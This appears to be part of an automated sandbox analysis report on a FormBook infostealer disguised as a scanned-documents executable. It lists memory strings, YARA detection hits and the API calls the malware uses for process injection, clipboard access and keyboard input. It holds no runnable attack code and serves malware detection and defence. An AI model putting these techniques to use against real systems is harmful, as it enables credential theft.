            Source: schtasks.exe, 00000004.00000002.4114511435.0000000006400000.00000004.00000800.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
            Source: schtasks.exe, 00000004.00000002.4112702566.0000000004EB6000.00000004.10000000.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
            Source: schtasks.exe, 00000004.00000002.4112702566.0000000004EB6000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4114511435.0000000006400000.00000004.00000800.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?
            Source: schtasks.exe, 00000004.00000002.4112702566.0000000004EB6000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4114511435.0000000006400000.00000004.00000800.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
            Source: schtasks.exe, 00000004.00000002.4112702566.0000000004EB6000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4114511435.0000000006400000.00000004.00000800.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
            Source: schtasks.exe, 00000004.00000002.4111169499.0000000003130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: schtasks.exe, 00000004.00000002.4111169499.0000000003130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: schtasks.exe, 00000004.00000002.4111169499.0000000003130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: schtasks.exe, 00000004.00000002.4111169499.0000000003130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: schtasks.exe, 00000004.00000002.4111169499.0000000003130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: schtasks.exe, 00000004.00000002.4111169499.0000000003130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: schtasks.exe, 00000004.00000003.2131359680.0000000007ECC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: schtasks.exe, 00000004.00000002.4112702566.0000000004EB6000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4114511435.0000000006400000.00000004.00000800.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000038B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://track.uc.cn/collect
            Source: schtasks.exe, 00000004.00000002.4114680149.0000000007EEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002FEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_002FEAFF
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002FED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_002FED6A
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002FEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_002FEAFF
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002EAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_002EAA57
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_00319576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00319576

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1950883710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4110797200.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4111043032.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1951519783.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4111935021.0000000003C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4111848670.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4113899205.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1951562901.0000000004990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1950883710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4110797200.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4111043032.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1951519783.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4111935021.0000000003C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4111848670.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4113899205.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1951562901.0000000004990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe, 00000000.00000000.1644507068.0000000000342000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_866695a4-6
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe, 00000000.00000000.1644507068.0000000000342000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_c619db8c-0
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_420655de-c
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_8ce1c832-0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042B293 NtClose,1_2_0042B293
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72B60 NtClose,LdrInitializeThunk,1_2_03C72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03C72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C735C0 NtCreateMutant,LdrInitializeThunk,1_2_03C735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C74340 NtSetContextThread,1_2_03C74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C74650 NtSuspendThread,1_2_03C74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72BE0 NtQueryValueKey,1_2_03C72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72BF0 NtAllocateVirtualMemory,1_2_03C72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72B80 NtQueryInformationFile,1_2_03C72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72BA0 NtEnumerateValueKey,1_2_03C72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72AD0 NtReadFile,1_2_03C72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72AF0 NtWriteFile,1_2_03C72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72AB0 NtWaitForSingleObject,1_2_03C72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72FE0 NtCreateFile,1_2_03C72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72F90 NtProtectVirtualMemory,1_2_03C72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72FA0 NtQuerySection,1_2_03C72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72FB0 NtResumeThread,1_2_03C72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72F60 NtCreateProcessEx,1_2_03C72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72F30 NtCreateSection,1_2_03C72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72EE0 NtQueueApcThread,1_2_03C72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72E80 NtReadVirtualMemory,1_2_03C72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72EA0 NtAdjustPrivilegesToken,1_2_03C72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72E30 NtWriteVirtualMemory,1_2_03C72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72DD0 NtDelayExecution,1_2_03C72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72DB0 NtEnumerateKey,1_2_03C72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72D00 NtSetInformationFile,1_2_03C72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72D10 NtMapViewOfSection,1_2_03C72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72D30 NtUnmapViewOfSection,1_2_03C72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72CC0 NtQueryVirtualMemory,1_2_03C72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72CF0 NtOpenProcess,1_2_03C72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72CA0 NtQueryInformationToken,1_2_03C72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72C60 NtCreateKey,1_2_03C72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72C70 NtFreeVirtualMemory,1_2_03C72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72C00 NtQueryInformationProcess,1_2_03C72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73090 NtSetValueKey,1_2_03C73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73010 NtOpenDirectoryObject,1_2_03C73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C739B0 NtGetContextThread,1_2_03C739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73D70 NtOpenThread,1_2_03C73D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C73D10 NtOpenProcessToken,1_2_03C73D10
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F4340 NtSetContextThread,LdrInitializeThunk,4_2_036F4340
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F4650 NtSuspendThread,LdrInitializeThunk,4_2_036F4650
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2B60 NtClose,LdrInitializeThunk,4_2_036F2B60
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2AF0 NtWriteFile,LdrInitializeThunk,4_2_036F2AF0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2AD0 NtReadFile,LdrInitializeThunk,4_2_036F2AD0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2F30 NtCreateSection,LdrInitializeThunk,4_2_036F2F30
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2FE0 NtCreateFile,LdrInitializeThunk,4_2_036F2FE0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2FB0 NtResumeThread,LdrInitializeThunk,4_2_036F2FB0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2EE0 NtQueueApcThread,LdrInitializeThunk,4_2_036F2EE0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_036F2D30
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2D10 NtMapViewOfSection,LdrInitializeThunk,4_2_036F2D10
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_036F2DF0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2DD0 NtDelayExecution,LdrInitializeThunk,4_2_036F2DD0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2C60 NtCreateKey,LdrInitializeThunk,4_2_036F2C60
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_036F2C70
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_036F2CA0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F35C0 NtCreateMutant,LdrInitializeThunk,4_2_036F35C0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F39B0 NtGetContextThread,LdrInitializeThunk,4_2_036F39B0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2BE0 NtQueryValueKey,4_2_036F2BE0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2BF0 NtAllocateVirtualMemory,4_2_036F2BF0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2BA0 NtEnumerateValueKey,4_2_036F2BA0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2B80 NtQueryInformationFile,4_2_036F2B80
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2AB0 NtWaitForSingleObject,4_2_036F2AB0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2F60 NtCreateProcessEx,4_2_036F2F60
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2FA0 NtQuerySection,4_2_036F2FA0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2F90 NtProtectVirtualMemory,4_2_036F2F90
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2E30 NtWriteVirtualMemory,4_2_036F2E30
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2EA0 NtAdjustPrivilegesToken,4_2_036F2EA0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2E80 NtReadVirtualMemory,4_2_036F2E80
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2D00 NtSetInformationFile,4_2_036F2D00
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2DB0 NtEnumerateKey,4_2_036F2DB0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2C00 NtQueryInformationProcess,4_2_036F2C00
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2CF0 NtOpenProcess,4_2_036F2CF0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F2CC0 NtQueryVirtualMemory,4_2_036F2CC0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F3010 NtOpenDirectoryObject,4_2_036F3010
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F3090 NtSetValueKey,4_2_036F3090
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F3D70 NtOpenThread,4_2_036F3D70
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_036F3D10 NtOpenProcessToken,4_2_036F3D10
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02B37B90 NtDeleteFile,4_2_02B37B90
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02B37940 NtCreateFile,4_2_02B37940
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02B37C30 NtClose,4_2_02B37C30
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002ED5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_002ED5EB
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002E1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_002E1201
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002EE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_002EE8F6
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_0028BF400_2_0028BF40
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002880600_2_00288060
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002F20460_2_002F2046
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002E82980_2_002E8298
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002BE4FF0_2_002BE4FF
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002B676B0_2_002B676B
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_003148730_2_00314873
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002ACAA00_2_002ACAA0
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_0028CAF00_2_0028CAF0
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_0029CC390_2_0029CC39
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002B6DD90_2_002B6DD9
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_0029D0640_2_0029D064
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_0029B1190_2_0029B119
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002891C00_2_002891C0
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002A13940_2_002A1394
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002A17060_2_002A1706
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002A781B0_2_002A781B
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002879200_2_00287920
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_0029997D0_2_0029997D
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002A19B00_2_002A19B0
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002A7A4A0_2_002A7A4A
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002A1C770_2_002A1C77
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002A7CA70_2_002A7CA7
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_0030BE440_2_0030BE44
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002B9EEE0_2_002B9EEE
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002A1F320_2_002A1F32
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_032036100_2_03203610
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004100E31_2_004100E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040109D1_2_0040109D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004010A01_2_004010A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E1631_2_0040E163
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402A491_2_00402A49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402A501_2_00402A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004033E01_2_004033E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FEC31_2_0040FEC3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042D6E31_2_0042D6E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402EB01_2_00402EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FEBB1_2_0040FEBB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004167CE1_2_004167CE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004027D01_2_004027D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004167D31_2_004167D3
